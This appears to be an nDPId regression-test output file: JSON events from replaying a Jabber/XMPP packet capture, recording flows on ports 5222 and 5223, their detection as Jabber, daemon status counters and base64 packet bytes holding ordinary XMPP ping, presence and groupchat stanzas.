+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1502380213387,"pkt":"Tl6SKSKGaFs1pN2oCABFAABEEUNAAEAGAACsEAA+rBABit8mFGZE6SgmjZ+UW4AYIABaHwAAAQEICk4Kc24AIDNjPC9zdHJlYW06c3RyZWFtPg=="} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380213387,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1502380213387,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57126,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380213387,"pkt":"Tl6SKSKGaFs1pN2oCABFAAA0xQRAAEAGAACsEAA+rBABit8mFGZE6Sg2jZ+UW4ARIABaDwAAAQEICk4Kc24AIDNj"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380213387,"pkt":"aFs1pN2oTl6SKSKGCABFAAA0Q+dAAEAGnPSsEAGKrBAAPhRm3yaNn5RbROkoNoAQAKyS+AAAAQEICgAgRPBOCnNu"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380249631,"flow_last_seen":1502380249631,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1502380249631,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57129,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1502380249631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1502380249631,"pkt":"Tl6SKSKGaFs1pN2oCABFAADAznVAAEAGAACsEAA+rBABit8pFGbSamxaY9XMjIAYIABamwAAAQEICk4LAEwAIKhkPGlxIHR5cGU9J3NldCcgaWQ9J3B1cnBsZWRkZTgwZmRhJyB0bz0nY3MteG1wcC5sYW4nPjxjb21tYW5kIHhtbG5zPSdodHRwOi8vamFiYmVyLm9yZy9wcm90b2NvbC9jb21tYW5kcycgbm9kZT0ncGluZycgYWN0aW9uPSdleGVjdXRlJy8+PC9pcT4="} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380249631,"flow_last_seen":1502380249631,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1502380249631,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57129,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1502380249632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380249632,"pkt":"aFs1pN2oTl6SKSKGCABFAAA0PqxAAEAGoi+sEAGKrBAAPhRm3ylj1cyM0mps5oAQALWX3gAAAQEICgAg0oZOCwBM"} +00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1502380249634,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1502380249634,"pkt":"aFs1pN2oTl6SKSKGCABFAAE1Pq1AAEAGoS2sEAGKrBAAPhRm3ylj1cyM0mps5oAYALXYFQAAAQEICgAg0ohOCwBMPGlxIHhtbDpsYW5nPSdlbicgdG89J3RvbUBjcy14bXBwLmxhbi9kYXJrc3RhcicgZnJvbT0nY3MteG1wcC5sYW4nIHR5cGU9J3Jlc3VsdCcgaWQ9J3B1cnBsZWRkZTgwZmRhJz48Y29tbWFuZCBzdGF0dXM9J2NvbXBsZXRlZCcgc2Vzc2lvbmlkPScyMDE3LTA4LTEwVDE1OjUxOjAxLjI1MjkxMlonIG5vZGU9J3BpbmcnIHhtbG5zPSdodHRwOi8vamFiYmVyLm9yZy9wcm90b2NvbC9jb21tYW5kcyc+PG5vdGU+UG9uZzwvbm90ZT48L2NvbW1hbmQ+PC9pcT4="} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":192,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":192,"packets-processed":189,"total-skipped-flows":0,"total-l4-payload-len":28826,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1502380393542} +00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":200,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1502380213387,"flow_last_seen":1502380213388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1502380400412,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57126,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380724652,"flow_last_seen":1502380724652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1502380724652,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57147,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1502380724652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1502380724652,"pkt":"Tl6SKSKGaFs1pN2oCABFAABA60NAAEAGAACsEAA+rBABit87FGY\/5vETAAAAALAC\/\/9aGwAAAgQFtAEDAwQBAQgKThI3ywAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1502380724653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1502380724653,"pkt":"aFs1pN2oTl6SKSKGCABFAAA8AABAAEAG4NOsEAGKrBAAPhRm3zt3JmV0P+bxFKASOJAcGgAAAgQFtAQCCAoAKBIgThI3ywEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1502380724653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380724653,"pkt":"Tl6SKSKGaFs1pN2oCABFAAA0qlxAAEAGAACsEAA+rBABit87FGY\/5vEUdyZldYAQICtaDwAAAQEICk4SN8sAKBIg"} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1502380724652,"flow_last_seen":1502380724653,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1502380724653,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57147,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380915481,"flow_last_seen":1502380915481,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1502380915481,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57149,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00789{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1502380915481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":305,"pkt_l4_len":271,"thread_ts_msec":1502380915481,"pkt":"Tl6SKSKGaFs1pN2oCABFAAEj8WlAAEAGAACsEAA+rBABit89FGZwJ5QInxoVWIAYIABa\/gAAAQEICk4VHZgAKjJ5PHByZXNlbmNlIHRvPSdjaGF0LXdpdGgtdG9tQGNvbmZlcmVuY2UuY3MteG1wcC5sYW4vdG9tQGNzLXhtcHAubGFuJz48YyB4bWxucz0naHR0cDovL2phYmJlci5vcmcvcHJvdG9jb2wvY2Fwcycgbm9kZT0naHR0cDovL3BpZGdpbi5pbS8nIGhhc2g9J3NoYS0xJyB2ZXI9J0RkbnlkUUc3UkdoUDlFM2s5U2YrYitiRjB6bz0nLz48eCB4bWxucz0naHR0cDovL2phYmJlci5vcmcvcHJvdG9jb2wvbXVjJy8+PC9wcmVzZW5jZT4="} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380915481,"flow_last_seen":1502380915481,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1502380915481,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57149,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +01012{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1502380915486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":474,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":474,"pkt_l4_len":440,"thread_ts_msec":1502380915486,"pkt":"aFs1pN2oTl6SKSKGCABFAAHMmGZAAEAGRt2sEAGKrBAAPhRm3z2fGhVYcCeU94AYAP5KTQAAAQEICgAq+5ZOFR2YPHByZXNlbmNlIHhtbDpsYW5nPSdlbicgdG89J3RvbUBjcy14bXBwLmxhbi9kYXJrc3RhcicgZnJvbT0nY2hhdC13aXRoLXRvbUBjb25mZXJlbmNlLmNzLXhtcHAubGFuL3RvbUBjcy14bXBwLmxhbic+PGMgeG1sbnM9J2h0dHA6Ly9qYWJiZXIub3JnL3Byb3RvY29sL2NhcHMnIG5vZGU9J2h0dHA6Ly9waWRnaW4uaW0vJyBoYXNoPSdzaGEtMScgdmVyPSdEZG55ZFFHN1JHaFA5RTNrOVNmK2IrYkYwem89Jy8+PHggeG1sbnM9J2h0dHA6Ly9qYWJiZXIub3JnL3Byb3RvY29sL211YyN1c2VyJz48aXRlbSBqaWQ9J3RvbUBjcy14bXBwLmxhbi9kYXJrc3Rhcicgcm9sZT0nbW9kZXJhdG9yJyBhZmZpbGlhdGlvbj0nb3duZXInLz48c3RhdHVzIGNvZGU9JzIwMScvPjxzdGF0dXMgY29kZT0nMTEwJy8+PC94PjwvcHJlc2VuY2U+"} +00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1502380915486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1502380915486,"pkt":"aFs1pN2oTl6SKSKGCABFAACsmGdAAEAGR\/ysEAGKrBAAPhRm3z2fGhbwcCeU94AYAP6TqgAAAQEICgAq+5ZOFR2YPG1lc3NhZ2UgdG89J3RvbUBjcy14bXBwLmxhbi9kYXJrc3RhcicgZnJvbT0nY2hhdC13aXRoLXRvbUBjb25mZXJlbmNlLmNzLXhtcHAubGFuJyB0eXBlPSdncm91cGNoYXQnPjxzdWJqZWN0Lz48L21lc3NhZ2U+"} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":260,"source":"jabber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1502380724652,"flow_last_seen":1502380725074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":338,"flow_tot_l4_payload_len":1426,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1502380919392,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57147,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":260,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":260,"packets-processed":243,"total-skipped-flows":0,"total-l4-payload-len":34275,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":36,"global_ts_msec":1502381519875} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":289,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":289,"packets-processed":270,"total-skipped-flows":0,"total-l4-payload-len":36212,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1504181789350} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1502379723841,"flow_last_seen":1502379726010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57094,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1502380175298,"flow_last_seen":1502380177456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13811,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57122,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1502380249631,"flow_last_seen":1502380673059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":3489,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57129,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1502380915481,"flow_last_seen":1502381571702,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":3658,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57149,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":302,"packets-processed":283,"total-skipped-flows":0,"total-l4-payload-len":36369,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1642668994159} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642668994159,"flow_last_seen":1642668994159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642668994159,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34218,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1642668994159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642668994159,"pkt":"eJS0JASgYDjgxTWgCABFAAA800FAAD8GO9vAqAJkoCzJZoWqFGdT1L5OAAAAAKAC\/\/8mUQAAAgQFtAQCCAoBJke0AAAAAAEDAwg="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1642668994188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1642668994188,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGGi2gLMlmwKgCZBRnhar53fA8U9S+T2ASchBjHgAAAgQFrAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1642668994235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1642668994235,"pkt":"eJS0JASgYDjgxTWgCABFAAAo00JAAD8GO+7AqAJkoCzJZoWqFGdT1L5P+d3wPVAQ\/\/\/s4wAA"} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1642668994159,"flow_last_seen":1642668994588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1642668994588,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34218,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1642669000423,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":317,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":317,"packets-processed":298,"total-skipped-flows":0,"total-l4-payload-len":36788,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":8,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1642778258433} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642778258433,"flow_last_seen":1642778258433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642778258433,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":37614,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1642778258433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642778258433,"pkt":"eJS0JASgYDjgxTWgCABFAAA8d8hAAD8Gl1TAqAJkoCzJZpLuFGecNBm6AAAAAKAC\/\/9wIgAAAgQFtAQCCAoBEkznAAAAAAEDAwg="} 